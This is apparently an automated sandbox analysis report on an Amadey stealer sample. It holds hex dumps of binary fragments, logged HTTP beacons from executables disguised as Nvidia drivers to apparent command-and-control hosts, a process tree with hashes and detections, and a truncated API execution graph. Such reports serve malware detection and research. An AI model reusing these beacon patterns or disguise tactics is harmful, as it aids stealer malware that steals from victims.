                                                                                                                                          2024-12-08 17:06:47 UTC1369INData Raw: eb 1b 85 ff 74 15 e8 37 ff ff ff 85 c0 74 08 89 18 89 70 0c 89 78 10 89 c6 eb 02 31 f6 83 c4 0c 89 f0 5b 5e 5f 5d c3 55 89 e5 56 89 ce 53 89 d3 e8 0d ff ff ff 85 db 0f 94 c1 85 f6 0f 9e c2 08 ca 75 16 85 c0 74 12 31 d2 89 58 0c 89 50 04 89 50 08 89 10 89 70 10 eb 02 31 c0 5b 5e 5d c3 55 89 e5 53 89 d3 51 85 d2 74 18 e8 d3 fe ff ff 85 c0 75 04 89 c3 eb 0b c7 00 28 00 00 00 89 58 0c eb f1 89 d8 5a 5b 5d c3 55 89 e5 57 31 ff 56 89 c6 53 51 8b 40 0c 0f be 08 80 f9 6e 75 0f 8d 50 01 bf 01 00 00 00 89 56 0c 0f be 48 01 31 db 8d 41 d0 3c 09 76 08 85 ff 74 3a f7 db eb 36 8d 41 d0 b9 0a 00 00 00 89 45 f0 8b 55 f0 b8 ff ff ff 7f 29 d0 99 f7 f9 39 d8 7c 17 6b db 0a 8b 45 f0 01 c3 8b 46 0c 8d 50 01 89 56 0c 0f be 48 01 eb be 83 cb ff 5a 89 d8 5b 5e 5f 5d c3 55 89 e5
                                                                                                                                          Data Ascii: t7tpx1[^_]UVSut1XPPp1[^]USQtu(XZ[]UW1VSQ@nuPVH1A<vt:6AEU)9|kEFPVHZ[^_]U
                                                                                                                                          2024-12-08 17:06:47 UTC1369INData Raw: c0 83 c4 1c 5b 5e 5f 5d c3 55 89 e5 57 56 89 d6 53 89 c3 83 ec 1c 8b 78 28 8b 43 0c 80 38 42 75 20 40 89 43 0c 89 d8 e8 30 ff ff ff 89 f1 ba 4e 00 00 00 89 04 24 89 d8 e8 d2 f9 ff ff 89 c6 eb d8 89 7b 28 83 c4 1c 89 f0 5b 5e 5f 5d c3 55 89 e5 57 56 89 d6 53 89 c3 83 ec 1c 8b 43 0c 80 38 57 75 4a 8d 50 01 bf 55 00 00 00 89 53 0c 80 78 01 50 75 0b 83 c0 02 bf 56 00 00 00 89 43 0c 89 d8 e8 d6 fe ff ff 89 fa 89 04 24 8b 0e 89 d8 e8 7b f9 ff ff 89 06 89 c2 85 c0 75 04 31 c0 eb 12 89 d8 e8 9b fc ff ff 85 c0 75 b0 eb ef b8 01 00 00 00 83 c4 1c 5b 5e 5f 5d c3 85 d2 79 0e c3 83 38 30 75 0d 85 d2 74 0c 8b 40 10 4a 85 c0 75 ef c3 31 c0 c3 8b 40 0c c3 8b 88 10 01 00 00 85 c9 74 0b 8b 41 04 8b 52 0c 8b 40 10 eb cd c7 80 18 01 00 00 01 00 00 00 31 c0 c3 55 89 e5 56 89
                                                                                                                                          Data Ascii: [^_]UWVSx(C8Bu @C0N${([^_]UWVSC8WuJPUSxPuVC${u1u[^_]y80ut@Ju1@tAR@1UV
                                                                                                                                          2024-12-08 17:06:47 UTC1369INData Raw: 8b 87 14 01 00 00 8b 59 0c 8d 54 24 30 89 44 24 14 31 c0 89 87 14 01 00 00 31 c0 89 44 24 1c 85 db 74 07 83 7c 24 1c 04 75 0f c7 87 18 01 00 00 01 00 00 00 e9 3e 15 00 00 8b 87 14 01 00 00 8b 8f 10 01 00 00 89 97 14 01 00 00 83 c2 10 89 5a f4 89 42 f0 31 c0 89 42 f8 8b 03 89 4a fc ff 44 24 1c 89 44 24 18 e8 03 f4 ff ff 85 c0 75 09 83 7c 24 18 02 75 5e eb 05 8b 5b 0c eb a2 8b 5b 10 83 3b 49 75 03 8b 5b 0c 8b 44 24 1c c1 e0 04 8d 54 04 30 85 db 74 93 8b 03 e8 d0 f3 ff ff 85 c0 74 32 83 7c 24 1c 04 74 81 0f 10 42 f0 8d 42 f0 89 5a f4 89 97 14 01 00 00 83 c2 10 0f 11 42 f0 89 42 f0 31 c0 89 42 e8 8b 5b 0c 89 4a ec ff 44 24 1c eb bf 83 3b 04 75 29 8d 44 24 28 89 4c 24 28 89 87 10 01 00 00 8b 43 10 89 5c 24 2c 83 38 5e 75 0f 8b 50 0c 89 53 10 8b 56 10 89 50 0c
                                                                                                                                          Data Ascii: YT$0D$11D$t|$u>ZB1BJD$D$u|$u^[[;Iu[D$T0tt2|$tBBZBB1B[JD$;u)D$(L$(C\$,8^uPSVP
                                                                                                                                          2024-12-08 17:06:47 UTC1369INData Raw: e8 35 f8 ff ff e9 14 10 00 00 89 f8 ba 7d 82 48 00 e8 72 f4 ff ff 8b 4e 0c ba 11 00 00 00 89 f8 e8 15 f8 ff ff e9 f4 0f 00 00 8b 49 10 8b 56 0c 89 f8 e8 0e f4 ff ff e9 e2 0f 00 00 8b 8f 14 01 00 00 85 c9 0f 84 3f 01 00 00 83 79 08 00 75 2b 8b 41 04 8b 00 8d 50 e7 83 fa 02 0f 87 2c 01 00 00 39 44 24 18 75 14 8b 4e 0c ba 11 00 00 00 89 f8 e8 c4 f7 ff ff e9 a3 0f 00 00 8b 09 eb c3 83 bf 20 01 00 00 00 8b 59 0c 0f 85 e5 00 00 00 31 c9 83 3b 05 89 4c 24 1c 0f 85 d6 00 00 00 8b 87 34 01 00 00 31 d2 39 c2 7d 4a 8b 8f 30 01 00 00 8d 0c d1 3b 19 74 03 42 eb ec 8d 44 24 20 8b 10 39 d3 74 6b 39 d6 75 08 8d 54 24 20 39 d0 75 5f 8b 40 04 85 c0 75 e7 8b 87 10 01 00 00 c7 44 24 1c 01 00 00 00 89 44 24 14 8b 41 04 89 87 10 01 00 00 eb 41 3b 87 38 01 00 00 0f 8d 33 0f 00
                                                                                                                                          Data Ascii: 5}HrNIV?yu+AP,9D$uN Y1;L$419}J0;tBD$ 9tk9uT$ 9u_@uD$D$AA;83
                                                                                                                                          2024-12-08 17:06:47 UTC1369INData Raw: c1 0a 00 00 89 f8 ba a1 82 48 00 e8 1f ef ff ff 8b 87 48 01 00 00 8b 4e 0c 85 c0 74 18 8b 97 10 01 00 00 89 44 24 34 89 54 24 30 8d 54 24 30 89 97 10 01 00 00 ba 11 00 00 00 89 f8 e8 a0 f2 ff ff 83 bf 48 01 00 00 00 0f 84 77 0a 00 00 8b 44 24 30 89 87 10 01 00 00 e9 68 0a 00 00 8b 49 0c ba 11 00 00 00 89 f8 e8 25 0f 00 00 e9 54 0a 00 00 8b 41 0c 8b 59 10 89 44 24 18 8b 00 83 f8 33 0f 85 f9 00 00 00 8b 44 24 18 8b 40 0c 8b 00 c7 44 24 04 ab 82 48 00 89 04 24 89 44 24 1c e8 a9 b2 00 00 89 c2 8b 03 85 d2 75 19 83 f8 03 75 14 8b 43 0c 83 38 01 75 35 8b 53 10 83 3a 2a 75 2d 89 c3 eb 29 83 f8 3a 75 24 8b 4b 0c 89 f8 ba 11 00 00 00 e8 d6 0e 00 00 8b 4c 24 18 ba 11 00 00 00 89 f8 e8 a9 0e 00 00 e9 d8 09 00 00 8b 44 24 1c c7 44 24 04 ae 82 48 00 89 04 24 e8 4b b2
                                                                                                                                          Data Ascii: HHNtD$4T$0T$0HwD$0hI%TAYD$3D$@D$H$D$uuC8u5S:*u-):u$KL$D$D$H$K


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          12192.168.2.449884104.21.9.1684436940C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-12-08 17:06:51 UTC144OUTPOST /get_update.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: gamertool.eu
                                                                                                                                          Content-Length: 19
                                                                                                                                          Expect: 100-continue
                                                                                                                                          2024-12-08 17:06:51 UTC19OUTData Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 39
                                                                                                                                          Data Ascii: current_version=0.9
                                                                                                                                          2024-12-08 17:06:51 UTC25INHTTP/1.1 100 Continue
                                                                                                                                          2024-12-08 17:06:52 UTC846INHTTP/1.1 200 OK
                                                                                                                                          Date: Sun, 08 Dec 2024 17:06:52 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oS3NCRnIRIUdJCjShfeyq%2FJ96RWk5%2FTmmqJRgaklPK7Jo8XG9lW%2ByKiNMHETWwp3PCDx16QuJhOGnXZdf9LCX1zM5vjDkZ6Zpe2yNc59Yg4Gv8Iu2UMN0vNWfmTbYLc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8eee5931edc5424f-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4267&min_rtt=2120&rtt_var=4886&sent=7&recv=10&lost=0&retrans=0&sent_bytes=3325&recv_bytes=823&delivery_rate=1377358&cwnd=234&unsent_bytes=0&cid=a6a029cd6a05efe7&ts=990&x=0"
                                                                                                                                          0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          13192.168.2.449886104.21.81.1534437216C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-12-08 17:06:52 UTC260OUTPOST /api HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                          Content-Length: 8
                                                                                                                                          Host: se-blurry.biz
                                                                                                                                          2024-12-08 17:06:52 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                          Data Ascii: act=life
                                                                                                                                          2024-12-08 17:06:53 UTC1009INHTTP/1.1 200 OK
                                                                                                                                          Date: Sun, 08 Dec 2024 17:06:53 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: PHPSESSID=qhf4n22o8bsa270vckbqd10snr; expires=Thu, 03-Apr-2025 10:53:32 GMT; Max-Age=9999999; path=/
                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RUjg%2FUiVNoFm2GG%2FTtPMLVYDIWnVD9WZOX%2B8YvWLlWLZ68UQtKnoX3BuTAiJPNQJAcwLnKLsqT7bw1LH82SIr%2Bdf6ypylsE0h4OJIcNq71JpuE6e5TYcM3yEpAsmD%2Bxn"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8eee5938da1d425b-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1674&min_rtt=1607&rtt_var=650&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=904&delivery_rate=1817050&cwnd=236&unsent_bytes=0&cid=9d01475f83431b22&ts=747&x=0"
                                                                                                                                          2024-12-08 17:06:53 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                          Data Ascii: 2ok
                                                                                                                                          2024-12-08 17:06:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Click to jump to process

                                                                                                                                          Click to jump to process

                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                          Click to jump to process

                                                                                                                                          Target ID:0
                                                                                                                                          Start time:12:04:54
                                                                                                                                          Start date:08/12/2024
                                                                                                                                          Path:C:\Users\user\Desktop\file.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                          Imagebase:0x490000
                                                                                                                                          File size:3'296'768 bytes
                                                                                                                                          MD5 hash:41F7104E635F418EC5A33D817B5324D9
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1693695905.0000000000491000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:1
                                                                                                                                          Start time:12:04:57
                                                                                                                                          Start date:08/12/2024
                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                                                                          Imagebase:0xac0000
                                                                                                                                          File size:3'296'768 bytes
                                                                                                                                          MD5 hash:41F7104E635F418EC5A33D817B5324D9
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.1724017680.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                          Antivirus matches:
                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:2
                                                                                                                                          Start time:12:04:57
                                                                                                                                          Start date:08/12/2024
                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                          Imagebase:0xac0000
                                                                                                                                          File size:3'296'768 bytes
                                                                                                                                          MD5 hash:41F7104E635F418EC5A33D817B5324D9
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.1728325404.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:6
                                                                                                                                          Start time:12:06:00
                                                                                                                                          Start date:08/12/2024
                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                          Imagebase:0xac0000
                                                                                                                                          File size:3'296'768 bytes
                                                                                                                                          MD5 hash:41F7104E635F418EC5A33D817B5324D9
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:false

                                                                                                                                          Target ID:7
                                                                                                                                          Start time:12:06:12
                                                                                                                                          Start date:08/12/2024
                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exe"
                                                                                                                                          Imagebase:0xdd0000
                                                                                                                                          File size:1'892'352 bytes
                                                                                                                                          MD5 hash:6367FB8A64F997BE8D65536534BDD057
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Antivirus matches:
                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:9
                                                                                                                                          Start time:12:06:37
                                                                                                                                          Start date:08/12/2024
                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exe"
                                                                                                                                          Imagebase:0x720000
                                                                                                                                          File size:25'600 bytes
                                                                                                                                          MD5 hash:3A14DCD85C597F6B51F3B5687D1043FA
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Antivirus matches:
                                                                                                                                          • Detection: 78%, ReversingLabs
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:10
                                                                                                                                          Start time:12:06:38
                                                                                                                                          Start date:08/12/2024
                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe"
                                                                                                                                          Imagebase:0x560000
                                                                                                                                          File size:25'600 bytes
                                                                                                                                          MD5 hash:3A14DCD85C597F6B51F3B5687D1043FA
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Antivirus matches:
                                                                                                                                          • Detection: 78%, ReversingLabs
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:false

                                                                                                                                          Target ID:11
                                                                                                                                          Start time:12:06:39
                                                                                                                                          Start date:08/12/2024
                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exe" --vision
                                                                                                                                          Imagebase:0x1a0000
                                                                                                                                          File size:25'600 bytes
                                                                                                                                          MD5 hash:3A14DCD85C597F6B51F3B5687D1043FA
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Antivirus matches:
                                                                                                                                          • Detection: 78%, ReversingLabs
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:false

                                                                                                                                          Target ID:12
                                                                                                                                          Start time:12:06:48
                                                                                                                                          Start date:08/12/2024
                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe" --vision
                                                                                                                                          Imagebase:0x590000
                                                                                                                                          File size:25'600 bytes
                                                                                                                                          MD5 hash:3A14DCD85C597F6B51F3B5687D1043FA
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:false

                                                                                                                                          Target ID:13
                                                                                                                                          Start time:12:06:49
                                                                                                                                          Start date:08/12/2024
                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exe"
                                                                                                                                          Imagebase:0x3d0000
                                                                                                                                          File size:1'461'248 bytes
                                                                                                                                          MD5 hash:7CB559130BBD743D4CDB0891749C5643
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Antivirus matches:
                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                          • Detection: 33%, ReversingLabs
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:14
                                                                                                                                          Start time:12:06:49
                                                                                                                                          Start date:08/12/2024
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:15
                                                                                                                                          Start time:12:06:56
                                                                                                                                          Start date:08/12/2024
                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exe" --vision
                                                                                                                                          Imagebase:0x390000
                                                                                                                                          File size:25'600 bytes
                                                                                                                                          MD5 hash:3A14DCD85C597F6B51F3B5687D1043FA
                                                                                                                                          Has elevated privileges:false
                                                                                                                                          Has administrator privileges:false
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:false

                                                                                                                                          Reset < >

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:3.2%
                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                            Signature Coverage:4.1%
                                                                                                                                            Total number of Nodes:763
                                                                                                                                            Total number of Limit Nodes:13
                                                                                                                                            execution_graph 12540 493c8e 12541 493c98 12540->12541 12543 493ca5 12541->12543 12548 492410 12541->12548 12544 493ccf 12543->12544 12545 493810 4 API calls 12543->12545 12546 493810 4 API calls 12544->12546 12545->12544 12547 493cdb 12546->12547 12549 492424 12548->12549 12552 4ab52d 12549->12552 12560 4c3aed 12552->12560 12555 4ab5a5 ___std_exception_copy 12567 4ab1ad 12555->12567 12556 4ab598 12563 4aaf56 12556->12563 12559 49242a 12559->12543 12571 4c4f29 12560->12571 12562 4ab555 12562->12555 12562->12556 12562->12559 12564 4aaf9f ___std_exception_copy 12563->12564 12566 4aafb2 shared_ptr 12564->12566 12577 4ab39f 12564->12577 12566->12559 12568 4ab1d8 12567->12568 12570 4ab1e1 shared_ptr 12567->12570 12569 4ab39f 5 API calls 12568->12569 12569->12570 12570->12559 12572 4c4f2e __fassign 12571->12572 12572->12562 12573 4c8bfc __fassign 12572->12573 12574 4cd634 __fassign 4 API calls 12572->12574 12575 4c65ed __fassign 3 API calls 12573->12575 12574->12573 12576 4c8c2f 12575->12576 12578 4abedf InitOnceExecuteOnce 12577->12578 12579 4ab3e1 12578->12579 12580 4ab3e8 12579->12580 12588 4c6cbb 12579->12588 12580->12566 12589 4c6cc7 __fassign 12588->12589 12590 4ca671 __fassign 4 API calls 12589->12590 12593 4c6ccc 12590->12593 12591 4c8bec __fassign 4 API calls 12592 4c6cf6 12591->12592 12593->12591 12706 4c6a44 12707 4c6a5c 12706->12707 12708 4c6a52 12706->12708 12711 4c698d 12707->12711 12710 4c6a76 __freea 12712 4c690a __fassign 4 API calls 12711->12712 12713 4c699f 12712->12713 12713->12710 12163 498780 12164 498786 12163->12164 12170 4c6729 12164->12170 12167 4987a6 12169 4987a0 12177 4c6672 12170->12177 12172 498793 12172->12167 12173 4c67b7 12172->12173 12174 4c67c3 __fassign 12173->12174 12176 4c67cd __cftof 12174->12176 12193 4c6740 12174->12193 12176->12169 12178 4c667e __fassign 12177->12178 12180 4c6685 __cftof 12178->12180 12181 4ca8c3 12178->12181 12180->12172 12182 4ca8cf __fassign 12181->12182 12185 4ca967 12182->12185 12184 4ca8ea 12184->12180 12187 4ca98a 12185->12187 12187->12187 12188 4ca9d0 __freea 12187->12188 12189 4cd82f 12187->12189 12188->12184 12192 4cd83c __fassign 12189->12192 12190 4cd867 RtlAllocateHeap 12191 4cd87a 12190->12191 12190->12192 12191->12188 12192->12190 12192->12191 12194 4c6762 12193->12194 12196 4c674d __cftof __freea 12193->12196 12194->12196 12197 4ca038 12194->12197 12196->12176 12198 4ca050 12197->12198 12200 4ca075 12197->12200 12198->12200 12201 4d0439 12198->12201 12200->12196 12202 4d0445 __fassign 12201->12202 12204 4d044d __cftof __dosmaperr 12202->12204 12205 4d052b 12202->12205 12204->12200 12206 4d054d 12205->12206 12210 4d0551 __cftof __dosmaperr 12205->12210 12206->12210 12211 4d00d2 12206->12211 12210->12204 12213 4d00e3 12211->12213 12212 4d0106 12212->12210 12215 4cfcc0 12212->12215 12213->12212 12222 4ca671 12213->12222 12216 4cfd0d 12215->12216 12255 4c690a 12216->12255 12218 4cffbc __floor_pentium4 12218->12210 12220 4cc719 GetPEB ExitProcess GetPEB RtlAllocateHeap __fassign 12221 4cfd1c __cftof __fassign 12220->12221 12221->12218 12221->12220 12263 4cb67d 12221->12263 12223 4ca67b __fassign 12222->12223 12224 4cd82f __fassign RtlAllocateHeap 12223->12224 12228 4ca694 __fassign __freea 12223->12228 12224->12228 12225 4ca722 12225->12212 12228->12225 12229 4c8bec 12228->12229 12230 4c8bf1 __fassign 12229->12230 12234 4c8bfc __fassign 12230->12234 12235 4cd634 12230->12235 12249 4c65ed 12234->12249 12237 4cd640 __fassign 12235->12237 12236 4cd69c __cftof 12236->12234 12237->12236 12238 4cd81b __fassign 12237->12238 12239 4cd726 12237->12239 12240 4cd751 __fassign 12237->12240 12241 4c65ed __fassign 3 API calls 12238->12241 12239->12240 12252 4cd62b 12239->12252 12240->12236 12244 4ca671 __fassign 4 API calls 12240->12244 12247 4cd7a5 12240->12247 12243 4cd82e 12241->12243 12244->12247 12246 4cd62b __fassign 4 API calls 12246->12240 12247->12236 12248 4ca671 __fassign 4 API calls 12247->12248 12248->12236 12250 4c64c7 __fassign 3 API calls 12249->12250 12251 4c65fe 12250->12251 12253 4ca671 __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 12252->12253 12254 4cd630 12253->12254 12254->12246 12256 4c692a 12255->12256 12257 4c6921 12255->12257 12256->12257 12258 4ca671 __fassign 4 API calls 12256->12258 12257->12221 12259 4c694a 12258->12259 12268 4cb5fb 12259->12268 12264 4ca671 __fassign 4 API calls 12263->12264 12265 4cb688 12264->12265 12266 4cb5fb __fassign 4 API calls 12265->12266 12267 4cb698 12266->12267 12267->12221 12269 4cb60e 12268->12269 12270 4c6960 12268->12270 12269->12270 12276 4cf5ab 12269->12276 12272 4cb628 12270->12272 12273 4cb63b 12272->12273 12274 4cb650 12272->12274 12273->12274 12283 4ce6b1 12273->12283 12274->12257 12277 4cf5b7 __fassign 12276->12277 12278 4ca671 __fassign 4 API calls 12277->12278 12280 4cf5c0 __fassign 12278->12280 12279 4cf606 12279->12270 12280->12279 12281 4c8bec __fassign 4 API calls 12280->12281 12282 4cf62b 12281->12282 12284 4ca671 __fassign 4 API calls 12283->12284 12285 4ce6bb 12284->12285 12288 4ce5c9 12285->12288 12287 4ce6c1 12287->12274 12289 4ce5d5 __fassign __freea 12288->12289 12290 4c8bec __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 12289->12290 12291 4ce5f6 12289->12291 12292 4ce668 12290->12292 12291->12287 12293 4ce6a4 12292->12293 12294 4ca72e __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 12292->12294 12293->12287 12295 4ce695 12294->12295 12296 4ce4b0 __fassign GetPEB ExitProcess GetPEB RtlAllocateHeap 12295->12296 12296->12293 12502 4920c0 12505 4ac68b 12502->12505 12504 4920cc 12508 4ac3d5 12505->12508 12507 4ac69b 12507->12504 12509 4ac3eb 12508->12509 12510 4ac3e1 12508->12510 12509->12507 12511 4ac3be 12510->12511 12512 4ac39e 12510->12512 12521 4acd0a 12511->12521 12512->12509 12517 4accd5 12512->12517 12515 4ac3d0 12515->12507 12518 4acce3 InitializeCriticalSectionEx 12517->12518 12520 4ac3b7 12517->12520 12518->12520 12520->12507 12522 4acd1f RtlInitializeConditionVariable 12521->12522 12522->12515 12523 49e0c0 recv 12524 49e122 recv 12523->12524 12525 49e157 recv 12524->12525 12527 49e191 12525->12527 12526 49e2b3 __floor_pentium4 12527->12526 12528 4ac6ac GetSystemTimePreciseAsFileTime 12527->12528 12529 49e2ee 12528->12529 12530 4ac26a 5 API calls 12529->12530 12531 49e358 12530->12531 12697 498980 12699 498aea 12697->12699 12700 4989d8 shared_ptr 12697->12700 12698 495c10 6 API calls 12698->12700 12700->12698 12700->12699 12717 492e00 12718 492e28 12717->12718 12719 4ac68b __Mtx_init_in_situ 2 API calls 12718->12719 12720 492e33 12719->12720 12532 4ad0c7 12533 4ad0d7 12532->12533 12534 4ad17f 12533->12534 12535 